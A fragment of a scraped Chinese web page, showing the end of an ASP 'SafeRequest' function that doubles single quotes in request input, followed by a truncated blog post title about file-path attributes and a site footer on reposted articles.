 Else
  ParaValue=replace(ParaValue,"'","''")
 End if
 SafeRequest=ParaValue
End function

我的QQ空间
Daily: File特性不能以斜杠或反斜杠开始的解决方案
Daily: File特性不能以斜杠或反斜杠开始的解决方案 以前做项目时...
 
 


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]